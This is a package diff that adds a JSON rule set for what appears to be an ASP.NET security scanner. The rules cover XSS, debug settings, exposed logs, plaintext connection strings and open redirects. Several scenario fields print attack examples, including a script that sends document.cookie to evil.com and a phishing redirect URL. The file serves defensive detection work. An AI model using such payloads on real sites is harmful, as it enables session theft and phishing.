@activemind/scd 1.4.0

package/rules/rules-aspx.json

@@ -0,0 +1,222 @@
+{
+  "schema_version": 1,
+  "rules": [
+    {
+      "id": "ASPX-DIAG-001",
+      "name": "Diagnostics page accessible in web root",
+      "severity": "HIGH",
+      "category": "Security Misconfiguration (OWASP A05)",
+      "pattern": "<%@\\s*Page[^%]*%>[\\s\\S]{0,2000}(?:Connection\\s*string\\s*(?:value|position)|ODBC|lblDBPath|lblDataPath|lblSystem|lblUnmanaged)",
+      "flags": "gi",
+      "file_types": ["aspx"],
+      "why": "A diagnostics page exposes server internals: connection string values, file system paths, database driver info, directory permissions, and personnel counts. Even with a soft \"must be activated\" guard, the page exists in the web root and may be bypassed.",
+      "scenario": "An attacker discovers the diagnostics URL (common names: Diagnostics.aspx, Admin.aspx, ServerInfo.aspx). The activation check is often a simple querystring flag or session value that can be brute-forced or bypassed. Once in, the attacker gets a complete map of the server.",
+      "fix": "Remove diagnostics pages entirely from production deployments. If needed for support, place them behind proper authentication, restrict by IP, and never expose connection strings in the UI. Use a deployment pipeline that strips diagnostic files."
+    },
+    {
+      "id": "ASPX-DIAG-002",
+      "name": "Log file linked directly from page markup",
+      "severity": "CRITICAL",
+      "category": "Security Misconfiguration (OWASP A05)",
+      "pattern": "(?:NavigateUrl|href)\\s*=\\s*[\"'~\\/]*[^\"']{0,60}(?:_Error|_Debug|error|debug|log|trace)\\s*\\.(?:txt|log)[\"'\\s]",
+      "flags": "gi",
+      "file_types": ["aspx", "ascx", "master"],
+      "why": "A direct link to a log file in the web root means anyone who finds or guesses the URL can download the full log. Log files in this codebase contain: usernames, session cookies, SQL queries with data, connection strings with passwords, stack traces with server paths, and PII.",
+      "scenario": "Attacker views page source or crawls the site. Finds href to bsoApp_Error.txt. Downloads it directly with no authentication. Extracts database credentials from logged connection strings and uses them for direct database access.",
+      "fix": "Never store log files in the web root. Write logs to a path outside the IIS application root (e.g. C:\\\\Logs\\\\App\\\\) or use a logging framework (NLog, Serilog) that writes to protected destinations. Remove all links to log files from markup immediately."
+    },
+    {
+      "id": "ASPX-DIAG-003",
+      "name": "Debug label rendered in production page",
+      "severity": "MEDIUM",
+      "category": "Security Misconfiguration (OWASP A05)",
+      "pattern": "(?:asp:Label|asp:Literal)[^>]*ID\\s*=\\s*[\"'](?:lbl)?(?:Debug|debug|Version|Diag|diag|BuildInfo)[^\"']*[\"']",
+      "flags": "gi",
+      "file_types": ["aspx", "ascx", "master"],
+      "why": "Server-side labels with debug or version IDs typically render internal build numbers, server names, or diagnostic state into the HTML response visible to anyone who views page source.",
+      "scenario": "Attacker views page source and finds lblDebug rendering \"Server: PROD-SQL01, Build: 2.00, Mode: debug\". This confirms server names, software versions, and debug mode — all useful for targeted attacks.",
+      "fix": "Remove debug labels from production builds. Use web.config transforms to disable debug output, or wrap debug rendering in #if DEBUG compiler directives."
+    },
+    {
+      "id": "ASPX-XSS-001",
+      "name": "Unencoded Response.Write in markup",
+      "severity": "HIGH",
+      "category": "Injection (OWASP A03)",
+      "pattern": "<%\\s*Response\\.Write\\s*\\([^%]{1,200}%>",
+      "flags": "gi",
+      "antipattern": "Server\\.HtmlEncode|HttpUtility\\.HtmlEncode|WebUtility\\.HtmlEncode|AntiXss\\.",
+      "antipattern_flags": "i",
+      "lookahead": 300,
+      "file_types": ["aspx", "ascx", "master"],
+      "why": "Response.Write outputs content directly to the HTTP response without HTML encoding. If the value originates from user input, a database field, or any external source, it enables Cross-Site Scripting (XSS).",
+      "scenario": "A contact field in the database contains <script>document.location=\"https://evil.com?c=\"+document.cookie</script>. Response.Write renders it verbatim. Every user who visits the page has their session cookie stolen.",
+      "fix": "Use <%: expression %> (ASP.NET 4.0+) which HTML-encodes automatically, or wrap the value: Response.Write(Server.HtmlEncode(value)). For rich content, use a whitelist HTML sanitizer."
+    },
+    {
+      "id": "ASPX-XSS-002",
+      "name": "Unencoded inline expression <%= ... %>",
+      "severity": "HIGH",
+      "category": "Injection (OWASP A03)",
+      "pattern": "<%=\\s*(?!(?:ResolveUrl|ClientScript|ScriptManager|GetRouteUrl|Url\\.Content))[A-Za-z_$][^%]{1,150}%>",
+      "flags": "g",
+      "antipattern": "Server\\.HtmlEncode|HttpUtility\\.HtmlEncode|AntiXss\\.",
+      "antipattern_flags": "i",
+      "lookahead": 10,
+      "file_types": ["aspx", "ascx", "master"],
+      "why": "<%= expr %> outputs the expression value raw, without HTML encoding. <%: expr %> is the safe equivalent introduced in ASP.NET 4.0.",
+      "scenario": "A query string parameter is reflected with <%= Request.QueryString[\"name\"] %>. Attacker crafts a URL with name=<script>alert(1)</script> and sends it to victims.",
+      "fix": "Replace <%= expr %> with <%: expr %> for all user-facing output. The colon syntax automatically HTML-encodes the value."
+    },
+    {
+      "id": "ASPX-XSS-003",
+      "name": "Request.QueryString or Request.Form used directly in markup",
+      "severity": "HIGH",
+      "category": "Injection (OWASP A03)",
+      "pattern": "<%[=:]?\\s*Request\\s*\\.\\s*(?:QueryString|Form|Params|Item)\\s*\\[",
+      "flags": "gi",
+      "antipattern": "Server\\.HtmlEncode|HttpUtility\\.HtmlEncode|AntiXss\\.",
+      "antipattern_flags": "i",
+      "lookahead": 200,
+      "file_types": ["aspx", "ascx", "master"],
+      "why": "Direct use of Request.QueryString or Request.Form in markup without encoding reflects user-controlled input into the page. Even with validateRequest=\"true\", bypasses exist via encoding tricks.",
+      "scenario": "Request.QueryString[\"search\"] is displayed in a \"You searched for: ...\" banner. Attacker crafts a link with XSS payload, sends it to an admin, and hijacks their session.",
+      "fix": "Always encode before output: <%: Request.QueryString[\"key\"] %> or Server.HtmlEncode(Request.QueryString[\"key\"]). Never use <%= Request... %> for displayed values."
+    },
+    {
+      "id": "ASPX-CONFIG-001",
+      "name": "EnableEventValidation=\"False\" disables tamper protection",
+      "severity": "HIGH",
+      "category": "Security Misconfiguration (OWASP A05)",
+      "pattern": "EnableEventValidation\\s*=\\s*[\"']False[\"']",
+      "flags": "gi",
+      "file_types": ["aspx"],
+      "why": "Event validation verifies that postback values (button clicks, dropdown selections) originated from the server-rendered page. Disabling it allows attackers to inject arbitrary values into postback data, potentially bypassing server-side controls.",
+      "scenario": "A dropdown only shows options the user is authorized to see. With event validation disabled, an attacker posts a value that was never rendered — accessing data or actions outside their permission level.",
+      "fix": "Remove EnableEventValidation=\"False\" from the @Page directive. If the page relies on JavaScript to add dynamic postback values, use ClientScriptManager.RegisterForEventValidation() to whitelist them properly instead of disabling the protection."
+    },
+    {
+      "id": "ASPX-CONFIG-002",
+      "name": "validateRequest=\"false\" disables XSS request filtering",
+      "severity": "HIGH",
+      "category": "Security Misconfiguration (OWASP A05)",
+      "pattern": "validateRequest\\s*=\\s*[\"']false[\"']",
+      "flags": "gi",
+      "file_types": ["aspx"],
+      "why": "ASP.NET request validation blocks requests containing potentially dangerous HTML/script content in form fields and query strings. Disabling it removes a valuable defense-in-depth layer against XSS attacks.",
+      "scenario": "An attacker submits <script>...</script> in a form field. Normally ASP.NET would reject this with HttpRequestValidationException. With validateRequest=false, the payload reaches the application code.",
+      "fix": "Remove validateRequest=\"false\". If you need to accept rich HTML input (e.g. a WYSIWYG editor field), use Request.Unvalidated[\"field\"] for that specific field only, and sanitize the input with a whitelist HTML sanitizer like HtmlSanitizer."
+    },
+    {
+      "id": "ASPX-CONFIG-003",
+      "name": "Debug=\"true\" in @Page directive — debug mode in production",
+      "severity": "HIGH",
+      "category": "Security Misconfiguration (OWASP A05)",
+      "pattern": "<%@\\s*Page[^%]*\\bDebug\\s*=\\s*[\"']true[\"']",
+      "flags": "gi",
+      "file_types": ["aspx"],
+      "why": "Pages compiled in debug mode include detailed error information, stack traces, and source code snippets in error responses. Debug mode also disables request timeouts and increases memory usage.",
+      "scenario": "An unhandled exception on a debug-mode page returns the full stack trace, source code around the error, and local variable values to the browser — exposing business logic, file paths, and potentially credentials.",
+      "fix": "Remove Debug=\"true\" from @Page directives. Control debug mode globally via Web.config: <compilation debug=\"false\" />. Use Web.config transforms to ensure production configs always have debug=false."
+    },
+    {
+      "id": "ASPX-WEB-001",
+      "name": "customErrors mode=\"Off\" — stack traces exposed to all users",
+      "severity": "CRITICAL",
+      "category": "Security Misconfiguration (OWASP A05)",
+      "pattern": "customErrors\\s+mode\\s*=\\s*[\"']Off[\"']",
+      "flags": "gi",
+      "file_types": ["config"],
+      "why": "With customErrors Off, ASP.NET returns the full exception stack trace, source code, and server paths to any visitor when an error occurs. This is the most common source of information disclosure in ASP.NET applications.",
+      "scenario": "An error on any page returns: exception type, message, full stack trace with file paths (C:\\\\inetpub\\\\wwwroot\\\\App\\\\...), source code snippet around the error, and sometimes query parameters or connection string fragments.",
+      "fix": "Set customErrors mode=\"RemoteOnly\" (shows details only to localhost) or mode=\"On\" with a custom error page: <customErrors mode=\"RemoteOnly\" defaultRedirect=\"~/Error.aspx\"><error statusCode=\"500\" redirect=\"~/Error.aspx\" /></customErrors>"
+    },
+    {
+      "id": "ASPX-WEB-002",
+      "name": "Trace enabled and accessible remotely",
+      "severity": "HIGH",
+      "category": "Security Misconfiguration (OWASP A05)",
+      "pattern": "<trace\\s[^>]*(?:enabled\\s*=\\s*[\"']true[\"'][^>]*localOnly\\s*=\\s*[\"']false[\"']|localOnly\\s*=\\s*[\"']false[\"'][^>]*enabled\\s*=\\s*[\"']true[\"'])",
+      "flags": "gi",
+      "file_types": ["config"],
+      "why": "ASP.NET trace captures detailed request information: HTTP headers, form values, session state, cookies, server variables, and execution timing. When localOnly=\"false\", this information is accessible to remote users at /trace.axd.",
+      "scenario": "Attacker visits yourapp.com/trace.axd and sees the last 40 requests including: session tokens, form POST data (including passwords), all HTTP headers, and ViewState values — a complete audit trail of recent user activity.",
+      "fix": "Disable trace in production: <trace enabled=\"false\" />. If you need trace for debugging, always set localOnly=\"true\" and disable it after use."
+    },
+    {
+      "id": "ASPX-WEB-003",
+      "name": "Compilation debug=\"true\" in Web.config",
+      "severity": "HIGH",
+      "category": "Security Misconfiguration (OWASP A05)",
+      "pattern": "<compilation[^>]*\\bdebug\\s*=\\s*[\"']true[\"']",
+      "flags": "gi",
+      "file_types": ["config"],
+      "why": "Debug compilation produces larger assemblies, disables script caching, and enables detailed error output. In production it degrades performance and increases the attack surface through verbose error responses.",
+      "scenario": "Combined with customErrors Off, debug=true means every unhandled exception shows full source code, variable values, and server paths. The error log in this case confirmed connection strings appearing in error output.",
+      "fix": "Set debug=\"false\" in Web.config for all production environments. Use Web.config transforms (Web.Release.config): <compilation xdt:Transform=\"RemoveAttributes(debug)\" />"
+    },
+    {
+      "id": "ASPX-WEB-004",
+      "name": "Connection string stored in Web.config in plain text",
+      "severity": "HIGH",
+      "category": "Sensitive Data Exposure (OWASP A02)",
+      "pattern": "<add\\s[^>]*(?:connectionString|ConnectionString)\\s*=\\s*[\"'][^\"']{0,200}(?:Password|PWD|pwd)\\s*=[^\"']{1,50}[\"']",
+      "flags": "gi",
+      "antipattern": "configProtectedData|EncryptedData|encrypt",
+      "antipattern_flags": "i",
+      "lookahead": 300,
+      "file_types": ["config"],
+      "why": "Plain text connection strings in Web.config expose database credentials to anyone who can read the file — through misconfigured file permissions, directory traversal, source control leaks, or backup files.",
+      "scenario": "A developer accidentally commits Web.config to a public repository. The connection string contains SERVER=PROD-SQL01;UID=appuser;PWD=Passw0rd123. Attacker connects directly to the production database.",
+      "fix": "Use DPAPI encryption for connectionStrings in Web.config: aspnet_regiis -pe \"connectionStrings\" -app \"/AppName\". Alternatively, use Windows Authentication (Integrated Security=True) to eliminate passwords from config files entirely."
+    },
+    {
+      "id": "ASPX-WEB-005",
+      "name": "ViewState MAC validation may be disabled",
+      "severity": "HIGH",
+      "category": "Security Misconfiguration (OWASP A05)",
+      "pattern": "enableViewStateMac\\s*=\\s*[\"']false[\"']|ViewStateEncryptionMode\\s*=\\s*[\"']Never[\"']",
+      "flags": "gi",
+      "file_types": ["config", "aspx"],
+      "why": "ViewState MAC (Message Authentication Code) prevents attackers from tampering with ViewState values. Disabling it allows an attacker to craft arbitrary ViewState payloads, potentially leading to object injection or business logic bypass.",
+      "scenario": "A hidden ViewState field stores the user's role. Without MAC validation, an attacker modifies the ViewState to set role=\"Admin\" and gains elevated privileges on the next postback.",
+      "fix": "Never set enableViewStateMac=\"false\". Ensure a strong machineKey is configured in Web.config. For sensitive data, use ViewStateEncryptionMode=\"Always\" at the page level."
+    },
+    {
+      "id": "ASPX-REDIRECT-001",
+      "name": "Open redirect via backurl / returnUrl parameter",
+      "severity": "MEDIUM",
+      "category": "Security Misconfiguration (OWASP A05)",
+      "pattern": "[?&\"'](backurl|returnUrl|returnto|redirect|next|goto)\\s*[\"']?\\s*[+=]\\s*(?:window\\.location|Request\\.|location\\.href)",
+      "flags": "gi",
+      "file_types": ["aspx", "ascx", "master"],
+      "why": "Building redirect URLs from user-controlled values without validation allows attackers to redirect users to malicious sites after a legitimate action (login, form submit).",
+      "scenario": "A link on a page includes backurl=https://evil.com/phish. User clicks it, performs a legitimate action, and is redirected to a phishing site that mimics the application. Used for credential harvesting.",
+      "fix": "Validate redirect URLs against a whitelist of allowed domains/paths before redirecting. Use a helper: if (!Uri.IsWellFormedUriString(returnUrl, UriKind.Relative)) returnUrl = \"~/Default.aspx\";"
+    },
+    {
+      "id": "ASPX-LIB-001",
+      "name": "jQuery 1.x or 2.x — end of life, known XSS vulnerabilities",
+      "severity": "MEDIUM",
+      "category": "Vulnerable and Outdated Components (OWASP A06)",
+      "pattern": "jquery[-_](?:1\\.\\d+\\.\\d+|2\\.\\d+\\.\\d+)(?:\\.min)?\\.js",
+      "flags": "gi",
+      "file_types": ["aspx", "ascx", "master", "html"],
+      "why": "jQuery 1.x reached end of life in 2016, jQuery 2.x in 2016. Both have known XSS vulnerabilities in $.html(), $.append(), and JSONP handling (CVE-2015-9251, CVE-2019-11358, CVE-2020-11022/11023).",
+      "scenario": "Application uses $.html(userContent) to render dynamic content. Attacker injects a payload that exploits CVE-2020-11023 to execute JavaScript even when the content appears to be sanitized.",
+      "fix": "Upgrade to jQuery 3.7.x (current LTS). Test for breaking changes using the jQuery Migrate plugin. Review all uses of $.html(), $.append(), $.prepend() and ensure content is sanitized before passing to these methods."
+    },
+    {
+      "id": "ASPX-FILE-001",
+      "name": "Sensitive file in web root — log or debug file publicly accessible",
+      "severity": "CRITICAL",
+      "category": "Sensitive Data Exposure (OWASP A02)",
+      "match_mode": "filename",
+      "pattern": "^[\\w\\-. ]*(?:error|debug|log|trace|diag)[\\w\\-. ]*\\.(?:txt|log)$",
+      "flags": "i",
+      "file_types": ["txt", "log"],
+      "why": "Log and debug files placed in the web root are directly downloadable by anyone who knows or guesses the filename. These files commonly contain: usernames, passwords, connection strings, SQL queries, stack traces with source paths, session tokens, and PII.",
+      "scenario": "In this codebase, bsoApp_Error.txt contained: a complete connection string with USERNAME and PASSWORD in plain text, SQL queries with user data, full stack traces with C:\\\\inetpub\\\\wwwroot paths, and names of real users. All freely downloadable.",
+      "fix": "Move all log files outside the web root immediately. Configure your logging framework to write to a protected path (e.g. D:\\\\Logs\\\\App\\\\). Add the log file pattern to Web.config to block HTTP access as defense-in-depth: <add verb=\"*\" path=\"*.log\" type=\"System.Web.HttpNotFoundHandler\" />"
+    }
+  ]
+}